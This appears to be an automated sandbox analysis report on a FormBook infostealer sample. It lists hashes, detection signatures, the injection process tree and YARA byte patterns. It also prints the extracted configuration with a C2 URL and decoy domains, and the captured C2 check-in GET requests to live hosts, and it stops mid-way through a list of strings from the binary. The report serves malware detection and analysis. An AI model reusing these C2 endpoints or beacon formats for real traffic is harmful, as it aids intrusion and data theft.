Loading ...

Play interactive tourEdit tour

Windows Analysis Report V5cfxBHd71.exe

Overview

General Information

Sample Name:V5cfxBHd71.exe
Analysis ID:458773
MD5:182170393a1acd19744575f00562384f
SHA1:e2b2d6405b359d78ba965b54e9cc6b38e223fd97
SHA256:71ec0c91aeec5071da283d23bceb39800e9ad6c133bb6aef99d1302f47a4ada3
Tags:exe
Infos:

Most interesting Screenshot:

Detection

FormBook
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for URL or domain
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for submitted file
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
System process connects to network (likely due to code injection or exploit)
Yara detected AntiVM3
Yara detected FormBook
C2 URLs / IPs found in malware configuration
Machine Learning detection for sample
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Performs DNS queries to domains with low reputation
Queues an APC in another process (thread injection)
Sample uses process hollowing technique
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to detect virtualization through RDTSC time measurements
Antivirus or Machine Learning detection for unpacked file
Binary contains a suspicious time stamp
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to read the PEB
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Enables debug privileges
Found inlined nop instructions (likely shell or obfuscated code)
HTTP GET or POST without a user agent
IP address seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

Process Tree

  • System is w10x64
  • V5cfxBHd71.exe (PID: 5700 cmdline: 'C:\Users\user\Desktop\V5cfxBHd71.exe' MD5: 182170393A1ACD19744575F00562384F)
    • V5cfxBHd71.exe (PID: 6092 cmdline: C:\Users\user\Desktop\V5cfxBHd71.exe MD5: 182170393A1ACD19744575F00562384F)
      • explorer.exe (PID: 3472 cmdline: C:\Windows\Explorer.EXE MD5: AD5296B280E8F522A8A897C96BAB0E1D)
      • msdt.exe (PID: 3332 cmdline: C:\Windows\SysWOW64\msdt.exe MD5: 7F0C51DBA69B9DE5DDF6AA04CE3A69F4)
        • cmd.exe (PID: 340 cmdline: /c del 'C:\Users\user\Desktop\V5cfxBHd71.exe' MD5: F3BDBE3BB6F734E357235F4D5898582D)
          • conhost.exe (PID: 1496 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
  • cleanup

Malware Configuration

Threatname: FormBook

{"C2 list": ["www.adultpeace.com/p2io/"], "decoy": ["essentiallyourscandles.com", "cleanxcare.com", "bigplatesmallwallet.com", "iotcloud.technology", "dmgt4m2g8y2uh.net", "malcorinmobiliaria.com", "thriveglucose.com", "fuhaitongxin.com", "magetu.info", "pyithuhluttaw.net", "myfavbutik.com", "xzklrhy.com", "anewdistraction.com", "mercuryaid.net", "thesoulrevitalist.com", "swayam-moj.com", "liminaltechnology.com", "lucytime.com", "alfenas.info", "carmelodesign.com", "newmopeds.com", "cyrilgraze.com", "ruhexuangou.com", "trendbold.com", "centergolosinas.com", "leonardocarrillo.com", "advancedaccessapplications.com", "aideliveryrobot.com", "defenestration.world", "zgcbw.net", "shopihy.com", "3cheer.com", "untylservice.com", "totally-seo.com", "cmannouncements.com", "tpcgzwlpyggm.mobi", "hfjxhs.com", "balloon-artists.com", "vectoroutlines.com", "boogerstv.com", "procircleacademy.com", "tricqr.com", "hazard-protection.com", "buylocalclub.info", "m678.xyz", "hiddenwholesale.com", "ololmychartlogin.com", "redudiban.com", "brunoecatarina.com", "69-1hn7uc.net", "zmzcrossrt.xyz", "dreamcashbuyers.com", "yunlimall.com", "jonathan-mandt.com", "painhut.com", "pandemisorgugirisi-tr.com", "sonderbach.net", "kce0728com.net", "austinpavingcompany.com", "biztekno.com", "rodriggi.com", "micheldrake.com", "foxwaybrasil.com", "a3i7ufz4pt3.net"]}

Yara Overview

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000004.00000002.352974421.0000000000B00000.00000040.00000001.sdmpJoeSecurity_FormBookYara detected FormBookJoe Security
    00000004.00000002.352974421.0000000000B00000.00000040.00000001.sdmpFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
    • 0x85e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x8972:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x14685:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
    • 0x14171:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
    • 0x14787:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
    • 0x148ff:$sequence_4: 5D C3 8D 50 7C 80 FA 07
    • 0x938a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
    • 0x133ec:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
    • 0xa102:$sequence_7: 66 89 0C 02 5B 8B E5 5D
    • 0x19777:$sequence_8: 3C 54 74 04 3C 74 75 F4
    • 0x1a81a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
    00000004.00000002.352974421.0000000000B00000.00000040.00000001.sdmpFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
    • 0x166a9:$sqlite3step: 68 34 1C 7B E1
    • 0x167bc:$sqlite3step: 68 34 1C 7B E1
    • 0x166d8:$sqlite3text: 68 38 2A 90 C5
    • 0x167fd:$sqlite3text: 68 38 2A 90 C5
    • 0x166eb:$sqlite3blob: 68 53 D8 7F 8C
    • 0x16813:$sqlite3blob: 68 53 D8 7F 8C
    00000004.00000002.353232950.0000000000F40000.00000040.00000001.sdmpJoeSecurity_FormBookYara detected FormBookJoe Security
      00000004.00000002.353232950.0000000000F40000.00000040.00000001.sdmpFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
      • 0x85e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
      • 0x8972:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
      • 0x14685:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
      • 0x14171:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
      • 0x14787:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
      • 0x148ff:$sequence_4: 5D C3 8D 50 7C 80 FA 07
      • 0x938a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
      • 0x133ec:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
      • 0xa102:$sequence_7: 66 89 0C 02 5B 8B E5 5D
      • 0x19777:$sequence_8: 3C 54 74 04 3C 74 75 F4
      • 0x1a81a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
      Click to see the 18 entries

      Unpacked PEs

      SourceRuleDescriptionAuthorStrings
      4.2.V5cfxBHd71.exe.400000.0.unpackJoeSecurity_FormBookYara detected FormBookJoe Security
        4.2.V5cfxBHd71.exe.400000.0.unpackFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
        • 0x77e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
        • 0x7b72:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
        • 0x13885:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
        • 0x13371:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
        • 0x13987:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
        • 0x13aff:$sequence_4: 5D C3 8D 50 7C 80 FA 07
        • 0x858a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
        • 0x125ec:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
        • 0x9302:$sequence_7: 66 89 0C 02 5B 8B E5 5D
        • 0x18977:$sequence_8: 3C 54 74 04 3C 74 75 F4
        • 0x19a1a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
        4.2.V5cfxBHd71.exe.400000.0.unpackFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
        • 0x158a9:$sqlite3step: 68 34 1C 7B E1
        • 0x159bc:$sqlite3step: 68 34 1C 7B E1
        • 0x158d8:$sqlite3text: 68 38 2A 90 C5
        • 0x159fd:$sqlite3text: 68 38 2A 90 C5
        • 0x158eb:$sqlite3blob: 68 53 D8 7F 8C
        • 0x15a13:$sqlite3blob: 68 53 D8 7F 8C
        4.2.V5cfxBHd71.exe.400000.0.raw.unpackJoeSecurity_FormBookYara detected FormBookJoe Security
          4.2.V5cfxBHd71.exe.400000.0.raw.unpackFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
          • 0x85e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
          • 0x8972:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
          • 0x14685:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
          • 0x14171:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
          • 0x14787:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
          • 0x148ff:$sequence_4: 5D C3 8D 50 7C 80 FA 07
          • 0x938a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
          • 0x133ec:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
          • 0xa102:$sequence_7: 66 89 0C 02 5B 8B E5 5D
          • 0x19777:$sequence_8: 3C 54 74 04 3C 74 75 F4
          • 0x1a81a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
          Click to see the 1 entries

          Sigma Overview

          System Summary:

          barindex
          Sigma detected: Possible Applocker BypassShow sources
          Source: Process startedAuthor: juju4: Data: Command: C:\Windows\SysWOW64\msdt.exe, CommandLine: C:\Windows\SysWOW64\msdt.exe, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\msdt.exe, NewProcessName: C:\Windows\SysWOW64\msdt.exe, OriginalFileName: C:\Windows\SysWOW64\msdt.exe, ParentCommandLine: C:\Users\user\Desktop\V5cfxBHd71.exe, ParentImage: C:\Users\user\Desktop\V5cfxBHd71.exe, ParentProcessId: 6092, ProcessCommandLine: C:\Windows\SysWOW64\msdt.exe, ProcessId: 3332

          Jbx Signature Overview

          Click to jump to signature section

          Show All Signature Results

          AV Detection:

          barindex
          Antivirus detection for URL or domainShow sources
          Source: http://www.boogerstv.com/p2io/?BJ=fW2NkW2j278wyrs6d/m+egXTc5dWq8qtohQAL+tQrXSmfdetyJ3HBVVg7jRLyNqpfuRL&b2Ml9=0txtgJLXY6ULBAvira URL Cloud: Label: malware
          Source: http://www.vectoroutlines.com/p2io/?BJ=RfOK6jKhDkXNwKgMe5LTyAppaXreGCTFIz0prsbY2047Xu3Gxs4GQwDY2/SnNVlkbHQV&b2Ml9=0txtgJLXY6ULBAvira URL Cloud: Label: malware
          Found malware configurationShow sources
          Source: 00000004.00000002.352974421.0000000000B00000.00000040.00000001.sdmpMalware Configuration Extractor: FormBook {"C2 list": ["www.adultpeace.com/p2io/"], "decoy": ["essentiallyourscandles.com", "cleanxcare.com", "bigplatesmallwallet.com", "iotcloud.technology", "dmgt4m2g8y2uh.net", "malcorinmobiliaria.com", "thriveglucose.com", "fuhaitongxin.com", "magetu.info", "pyithuhluttaw.net", "myfavbutik.com", "xzklrhy.com", "anewdistraction.com", "mercuryaid.net", "thesoulrevitalist.com", "swayam-moj.com", "liminaltechnology.com", "lucytime.com", "alfenas.info", "carmelodesign.com", "newmopeds.com", "cyrilgraze.com", "ruhexuangou.com", "trendbold.com", "centergolosinas.com", "leonardocarrillo.com", "advancedaccessapplications.com", "aideliveryrobot.com", "defenestration.world", "zgcbw.net", "shopihy.com", "3cheer.com", "untylservice.com", "totally-seo.com", "cmannouncements.com", "tpcgzwlpyggm.mobi", "hfjxhs.com", "balloon-artists.com", "vectoroutlines.com", "boogerstv.com", "procircleacademy.com", "tricqr.com", "hazard-protection.com", "buylocalclub.info", "m678.xyz", "hiddenwholesale.com", "ololmychartlogin.com", "redudiban.com", "brunoecatarina.com", "69-1hn7uc.net", "zmzcrossrt.xyz", "dreamcashbuyers.com", "yunlimall.com", "jonathan-mandt.com", "painhut.com", "pandemisorgugirisi-tr.com", "sonderbach.net", "kce0728com.net", "austinpavingcompany.com", "biztekno.com", "rodriggi.com", "micheldrake.com", "foxwaybrasil.com", "a3i7ufz4pt3.net"]}
          Multi AV Scanner detection for domain / URLShow sources
          Source: vectoroutlines.comVirustotal: Detection: 5%Perma Link
          Multi AV Scanner detection for submitted fileShow sources
          Source: V5cfxBHd71.exeVirustotal: Detection: 29%Perma Link
          Source: V5cfxBHd71.exeReversingLabs: Detection: 30%
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 4.2.V5cfxBHd71.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 4.2.V5cfxBHd71.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 00000004.00000002.352974421.0000000000B00000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000002.353232950.0000000000F40000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000011.00000002.497388587.0000000000A40000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000011.00000002.500475231.0000000000E90000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000002.352380368.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000011.00000002.499943855.0000000000E60000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.258699660.00000000041D9000.00000004.00000001.sdmp, type: MEMORY
          Machine Learning detection for sampleShow sources
          Source: V5cfxBHd71.exeJoe Sandbox ML: detected
          Source: 4.2.V5cfxBHd71.exe.400000.0.unpackAvira: Label: TR/Crypt.ZPACK.Gen
          Source: V5cfxBHd71.exeStatic PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
          Source: V5cfxBHd71.exeStatic PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
          Source: Binary string: wscui.pdbUGP source: explorer.exe, 00000007.00000000.293172647.000000000EC00000.00000002.00000001.sdmp
          Source: Binary string: msdt.pdbGCTL source: V5cfxBHd71.exe, 00000004.00000002.354477795.0000000002EE0000.00000040.00000001.sdmp
          Source: Binary string: wntdll.pdbUGP source: V5cfxBHd71.exe, 00000004.00000002.353531484.000000000109F000.00000040.00000001.sdmp
          Source: Binary string: wntdll.pdb source: V5cfxBHd71.exe, 00000004.00000002.353531484.000000000109F000.00000040.00000001.sdmp, msdt.exe
          Source: Binary string: msdt.pdb source: V5cfxBHd71.exe, 00000004.00000002.354477795.0000000002EE0000.00000040.00000001.sdmp
          Source: Binary string: wscui.pdb source: explorer.exe, 00000007.00000000.293172647.000000000EC00000.00000002.00000001.sdmp
          Source: C:\Users\user\Desktop\V5cfxBHd71.exeCode function: 4x nop then pop edi
          Source: C:\Users\user\Desktop\V5cfxBHd71.exeCode function: 4x nop then pop ebx
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 4x nop then pop edi
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 4x nop then pop ebx

          Networking:

          barindex
          Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)Show sources
          Source: TrafficSnort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.5:49726 -> 198.54.126.105:80
          Source: TrafficSnort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.5:49726 -> 198.54.126.105:80
          Source: TrafficSnort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.5:49726 -> 198.54.126.105:80
          Source: TrafficSnort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.5:49729 -> 34.102.136.180:80
          Source: TrafficSnort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.5:49729 -> 34.102.136.180:80
          Source: TrafficSnort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.5:49729 -> 34.102.136.180:80
          Source: TrafficSnort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.5:49733 -> 223.29.234.230:80
          Source: TrafficSnort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.5:49733 -> 223.29.234.230:80
          Source: TrafficSnort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.5:49733 -> 223.29.234.230:80
          C2 URLs / IPs found in malware configurationShow sources
          Source: Malware configuration extractorURLs: www.adultpeace.com/p2io/
          Performs DNS queries to domains with low reputationShow sources
          Source: C:\Windows\explorer.exeDNS query: www.m678.xyz
          Source: global trafficHTTP traffic detected: GET /p2io/?BJ=RfOK6jKhDkXNwKgMe5LTyAppaXreGCTFIz0prsbY2047Xu3Gxs4GQwDY2/SnNVlkbHQV&b2Ml9=0txtgJLXY6ULB HTTP/1.1Host: www.vectoroutlines.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /p2io/?BJ=hDwxgnCxHqZG/nBf9NFToL98ekU0apx9FaMqifAGLuP7v/j66cUXhxpzlnLclYHrbOLF&b2Ml9=0txtgJLXY6ULB HTTP/1.1Host: www.3cheer.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /p2io/?BJ=fW2NkW2j278wyrs6d/m+egXTc5dWq8qtohQAL+tQrXSmfdetyJ3HBVVg7jRLyNqpfuRL&b2Ml9=0txtgJLXY6ULB HTTP/1.1Host: www.boogerstv.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: Joe Sandbox ViewIP Address: 198.54.117.218 198.54.117.218
          Source: global trafficHTTP traffic detected: GET /p2io/?BJ=RfOK6jKhDkXNwKgMe5LTyAppaXreGCTFIz0prsbY2047Xu3Gxs4GQwDY2/SnNVlkbHQV&b2Ml9=0txtgJLXY6ULB HTTP/1.1Host: www.vectoroutlines.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /p2io/?BJ=hDwxgnCxHqZG/nBf9NFToL98ekU0apx9FaMqifAGLuP7v/j66cUXhxpzlnLclYHrbOLF&b2Ml9=0txtgJLXY6ULB HTTP/1.1Host: www.3cheer.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /p2io/?BJ=fW2NkW2j278wyrs6d/m+egXTc5dWq8qtohQAL+tQrXSmfdetyJ3HBVVg7jRLyNqpfuRL&b2Ml9=0txtgJLXY6ULB HTTP/1.1Host: www.boogerstv.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: unknownDNS traffic detected: queries for: www.tpcgzwlpyggm.mobi
          Source: V5cfxBHd71.exe, 00000000.00000002.271663578.00000000063E0000.00000002.00000001.sdmp, explorer.exe, 00000007.00000000.290098418.000000000BC30000.00000002.00000001.sdmpString found in binary or memory: http://fontfabrik.com
          Source: V5cfxBHd71.exe, 00000000.00000002.257959634.00000000031D1000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
          Source: V5cfxBHd71.exe, 00000000.00000003.236794650.00000000062AE000.00000004.00000001.sdmp, explorer.exe, 00000007.00000000.290098418.000000000BC30000.00000002.00000001.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
          Source: V5cfxBHd71.exe, 00000000.00000002.271663578.00000000063E0000.00000002.00000001.sdmp, explorer.exe, 00000007.00000000.290098418.000000000BC30000.00000002.00000001.sdmpString found in binary or memory: http://www.carterandcone.coml
          Source: V5cfxBHd71.exe, 00000000.00000003.242605012.00000000062A9000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.co
          Source: V5cfxBHd71.exe, 00000000.00000002.271663578.00000000063E0000.00000002.00000001.sdmp, explorer.exe, 00000007.00000000.290098418.000000000BC30000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com
          Source: V5cfxBHd71.exe, 00000000.00000003.243718619.000000000627E000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.com.TTF5
          Source: V5cfxBHd71.exe, 00000000.00000003.242665214.000000000627F000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/
          Source: explorer.exe, 00000007.00000000.290098418.000000000BC30000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers
          Source: V5cfxBHd71.exe, 00000000.00000003.243369085.00000000062A9000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers#
          Source: V5cfxBHd71.exe, 00000000.00000003.242288324.00000000062A9000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers$
          Source: V5cfxBHd71.exe, 00000000.00000003.241133154.00000000062AC000.00000004.00000001.sdmp, V5cfxBHd71.exe, 00000000.00000003.240999247.00000000062A9000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/
          Source: V5cfxBHd71.exe, 00000000.00000002.271663578.00000000063E0000.00000002.00000001.sdmp, explorer.exe, 00000007.00000000.290098418.000000000BC30000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/?
          Source: V5cfxBHd71.exe, 00000000.00000003.243233476.000000000627C000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/cabarga.html
          Source: V5cfxBHd71.exe, 00000000.00000002.271663578.00000000063E0000.00000002.00000001.sdmp, explorer.exe, 00000007.00000000.290098418.000000000BC30000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
          Source: V5cfxBHd71.exe, 00000000.00000003.243233476.000000000627C000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlu
          Source: V5cfxBHd71.exe, 00000000.00000003.242570041.00000000062A9000.00000004.00000001.sdmp, V5cfxBHd71.exe, 00000000.00000002.271663578.00000000063E0000.00000002.00000001.sdmp, explorer.exe, 00000007.00000000.290098418.000000000BC30000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/frere-jones.html
          Source: V5cfxBHd71.exe, 00000000.00000002.271663578.00000000063E0000.00000002.00000001.sdmp, explorer.exe, 00000007.00000000.290098418.000000000BC30000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers8
          Source: V5cfxBHd71.exe, 00000000.00000003.242354981.00000000062A9000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers:
          Source: V5cfxBHd71.exe, 00000000.00000002.271663578.00000000063E0000.00000002.00000001.sdmp, explorer.exe, 00000007.00000000.290098418.000000000BC30000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers?
          Source: V5cfxBHd71.exe, 00000000.00000003.249525924.00000000062A9000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designersE
          Source: V5cfxBHd71.exe, 00000000.00000002.271663578.00000000063E0000.00000002.00000001.sdmp, explorer.exe, 00000007.00000000.290098418.000000000BC30000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designersG
          Source: V5cfxBHd71.exe, 00000000.00000003.243484955.00000000062A9000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designersb
          Source: V5cfxBHd71.exe, 00000000.00000003.242665214.000000000627F000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.comF5
          Source: V5cfxBHd71.exe, 00000000.00000003.242665214.000000000627F000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.comF:
          Source: V5cfxBHd71.exe, 00000000.00000003.243584347.000000000627F000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.comFQ
          Source: V5cfxBHd71.exe, 00000000.00000003.242665214.000000000627F000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.comR.TTF
          Source: V5cfxBHd71.exe, 00000000.00000003.243501826.000000000627F000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.comals
          Source: V5cfxBHd71.exe, 00000000.00000003.243584347.000000000627F000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.comalsFC
          Source: V5cfxBHd71.exe, 00000000.00000003.243584347.000000000627F000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.comcom:
          Source: V5cfxBHd71.exe, 00000000.00000003.242665214.000000000627F000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.comcomd
          Source: V5cfxBHd71.exe, 00000000.00000003.243718619.000000000627E000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.comd
          Source: V5cfxBHd71.exe, 00000000.00000003.242665214.000000000627F000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.comdy
          Source: V5cfxBHd71.exe, 00000000.00000003.242665214.000000000627F000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.comgrito
          Source: V5cfxBHd71.exe, 00000000.00000003.256705491.0000000006270000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.comm
          Source: V5cfxBHd71.exe, 00000000.00000003.242665214.000000000627F000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.comrsiv
          Source: V5cfxBHd71.exe, 00000000.00000003.243233476.000000000627C000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.comueTFC
          Source: V5cfxBHd71.exe, 00000000.00000002.271663578.00000000063E0000.00000002.00000001.sdmp, explorer.exe, 00000007.00000000.290098418.000000000BC30000.00000002.00000001.sdmpString found in binary or memory: http://www.fonts.com
          Source: V5cfxBHd71.exe, 00000000.00000003.235839455.00000000062AA000.00000004.00000001.sdmp, explorer.exe, 00000007.00000000.290098418.000000000BC30000.00000002.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn
          Source: V5cfxBHd71.exe, 00000000.00000003.236344657.00000000062AF000.00000004.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn/
          Source: V5cfxBHd71.exe, 00000000.00000002.271663578.00000000063E0000.00000002.00000001.sdmp, explorer.exe, 00000007.00000000.290098418.000000000BC30000.00000002.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn/bThe
          Source: V5cfxBHd71.exe, 00000000.00000002.271663578.00000000063E0000.00000002.00000001.sdmp, explorer.exe, 00000007.00000000.290098418.000000000BC30000.00000002.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn/cThe
          Source: V5cfxBHd71.exe, 00000000.00000003.245350985.00000000062A9000.00000004.00000001.sdmp, V5cfxBHd71.exe, 00000000.00000003.246243890.000000000627E000.00000004.00000001.sdmpString found in binary or memory: http://www.galapagosdesign.com/
          Source: V5cfxBHd71.exe, 00000000.00000002.271663578.00000000063E0000.00000002.00000001.sdmp, explorer.exe, 00000007.00000000.290098418.000000000BC30000.00000002.00000001.sdmpString found in binary or memory: http://www.galapagosdesign.com/DPlease
          Source: V5cfxBHd71.exe, 00000000.00000003.245511901.00000000062A9000.00000004.00000001.sdmp, V5cfxBHd71.exe, 00000000.00000002.271663578.00000000063E0000.00000002.00000001.sdmp, explorer.exe, 00000007.00000000.290098418.000000000BC30000.00000002.00000001.sdmpString found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
          Source: V5cfxBHd71.exe, 00000000.00000003.245760419.000000000628A000.00000004.00000001.sdmpString found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htmo
          Source: V5cfxBHd71.exe, 00000000.00000002.271663578.00000000063E0000.00000002.00000001.sdmp, explorer.exe, 00000007.00000000.290098418.000000000BC30000.00000002.00000001.sdmpString found in binary or memory: http://www.goodfont.co.kr
          Source: V5cfxBHd71.exe, 00000000.00000003.239126621.000000000627C000.00000004.00000001.sdmp, explorer.exe, 00000007.00000000.290098418.000000000BC30000.00000002.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/
          Source: V5cfxBHd71.exe, 00000000.00000003.238699786.000000000627D000.00000004.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/)
          Source: V5cfxBHd71.exe, 00000000.00000003.238966135.0000000006273000.00000004.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/9
          Source: V5cfxBHd71.exe, 00000000.00000003.238699786.000000000627D000.00000004.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/:
          Source: V5cfxBHd71.exe, 00000000.00000003.239126621.000000000627C000.00000004.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/C
          Source: V5cfxBHd71.exe, 00000000.00000003.239126621.000000000627C000.00000004.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/Y0
          Source: V5cfxBHd71.exe, 00000000.00000003.239126621.000000000627C000.00000004.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/ch
          Source: V5cfxBHd71.exe, 00000000.00000003.239126621.000000000627C000.00000004.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/d
          Source: V5cfxBHd71.exe, 00000000.00000003.238699786.000000000627D000.00000004.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/f
          Source: V5cfxBHd71.exe, 00000000.00000003.239126621.000000000627C000.00000004.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/help5
